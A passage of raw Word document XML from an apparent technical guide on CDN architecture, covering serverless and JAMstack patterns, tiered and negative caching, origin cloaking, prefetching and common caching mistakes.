          <w:numId w:val="1345"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Use surrogate keys (tags): when product changes, purge tag "product-{id}".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642B3F0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1345"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>All related cached responses (product page, search results containing the product, category pages) are invalidated simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FDC8BE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 CDN + Serverless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0AF09A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCF3AD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>User → CDN Edge → [Edge Function (Workers/Lambda@Edge)] → [Serverless Origin (Lambda/Cloud Functions)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDD025E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The full-stack serverless pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0DE23" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1346"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge function handles routing, auth, personalization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0846C6A6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1346"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN cache handles static content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F914B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1346"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Serverless functions handle dynamic logic (only on cache miss).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B5AC90" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1346"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>No servers to manage at any layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA9BA45" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance advantage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5BDE7C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge function: &lt; 5ms cold start (V8 isolates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1872E05D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN cache hit: 0ms origin latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1614CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Serverless miss: only pays origin latency for truly dynamic requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2894C1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.3 CDN + JAMstack (Static Sites)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF5DE6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321F35C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Build time: Generate static HTML/CSS/JS → Push to CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1881C9BF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>User → CDN Edge → Cache HIT → Return static page (5ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46255624" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why JAMstack + CDN is powerful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21666DEF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Entire site is pre-generated and cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71942EE8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>100% cache hit ratio for all pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD86640" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Zero origin servers needed (CDN IS the host).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D79BB5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Infinite scalability (CDN handles any traffic spike).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7D75A1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Near-instant page loads globally (everything from edge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16532A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dynamic elements:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Handled client-side via JavaScript calling APIs (which themselves may be CDN-cached).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39815C82" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="4415AA65">
          <v:rect id="_x0000_i4699" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C6B095" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. Advanced CDN Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B71174E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.1 Tiered Caching with Custom Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C97B047" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32525C53" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge → Regional Cache → Shield → Origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CACAF66" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="27D1AE54" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Each tier has different:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321990ED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Storage capacity (edge: GB, regional: TB, shield: 10s TB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D9A7B8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Cache promotion rules (only promote to higher tier if accessed N times)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E040C98" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Eviction pressure (edge evicts aggressively, shield retains longer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C63F964" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.2 Negative Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72632075" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Caching error responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE10C02" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57968AF5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin returns 404 for /nonexistent-page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455DB7DD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN caches the 404 for 60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763717A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Next 10,000 requests for same URL → served from cache (404 from edge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D052723" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin handles 1 request, not 10,001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB7767" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Bots and scanners generate millions of 404s. Without negative caching, each hits origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E096D7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E078993" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4235B394" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: public, s-maxage=60  (on 404 responses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2137132D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.3 Origin Cloaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E77A17" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hiding origin completely:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4343AEE7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1349"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin IP is never in public DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699B900" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1349"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin firewall: accept connections ONLY from CDN IP ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225AE9C0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1349"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin has no public-facing ports (accessible only via private network from CDN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C63FCC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1349"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Even if attacker discovers origin IP, they can't connect directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A2ECF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1432696F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin is immune to direct DDoS (attack must go through CDN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D037D92" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No accidental bypass of CDN security (WAF, rate limiting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F5375C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin can be minimal (no TLS, no rate limiting — CDN handles it all).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F599EDD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.4 Prefetch and Predictive Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3040F9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN anticipates what users will need next:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6239959A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link prefetching:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> CDN parses HTML responses, identifies linked resources, proactively fetches them to edge cache before users request them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562D2C9B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Predictive pre-warming:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> ML models predict which content will become popular (trending topics, scheduled releases) and pre-populate edges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E151339" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User navigation prediction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Based on common navigation patterns (homepage → product page → checkout), pre-warm the likely next resources at the edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F2E2D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="0E36ABF4">
          <v:rect id="_x0000_i4700" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EB3E39" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. CDN Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBF14A7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.1 Common Mistakes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608845EC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Caching personalized content publicly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF674B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095A8C0E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Bad: Cache-Control: public, max-age=3600 (on user-specific page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BBA676" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>→ User A's private data served to User B!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EDF19B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Always: private/personalized content must be Cache-Control: private or no-store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315AA126" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Not varying on necessary dimensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE50079" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785021B5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Same URL serves different content based on Accept-Language, but no Vary header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A116B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>→ Japanese user gets English-cached page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB08AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Cache-busting with random query strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B856F2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC5F0E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/style.css?t=1685267123 (timestamp — changes every second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11074719" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>→ Every request is a unique cache key → 0% hit ratio → CDN is pointless.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F4799" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Use content-hash instead (changes only when content changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AA974B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Very short TTLs defeating CDN purpose:</w:t>
